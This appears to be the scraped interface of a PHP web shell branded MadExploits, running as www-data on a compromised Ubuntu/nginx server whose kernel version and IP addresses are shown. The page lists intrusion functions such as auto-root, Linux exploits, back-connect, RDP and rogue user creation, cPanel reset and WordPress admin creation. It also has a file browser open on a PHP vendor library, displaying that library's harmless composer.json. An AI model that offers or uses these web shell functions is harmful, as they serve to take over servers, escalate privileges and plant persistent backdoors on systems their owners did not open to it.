Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
sebastian /
version /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxr-x
.gitattributes
15
B
-rwxrwxr-x
.gitignore
7
B
-rwxrwxr-x
.php_cs
1.87
KB
-rwxrwxr-x
LICENSE
1.51
KB
-rwxrwxr-x
README.md
2
KB
-rwxrwxr-x
composer.json
705
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "sebastian/version", "description": "Library that helps with managing the version number of Git-hosted PHP projects", "homepage": "https://github.com/sebastianbergmann/version", "license": "BSD-3-Clause", "authors": [ { "name": "Sebastian Bergmann", "email": "sebastian@phpunit.de", "role": "lead" } ], "support": { "issues": "https://github.com/sebastianbergmann/version/issues" }, "require": { "php": ">=5.6" }, "autoload": { "classmap": [ "src/" ] }, "extra": { "branch-alias": { "dev-master": "2.0.x-dev" } } }
Close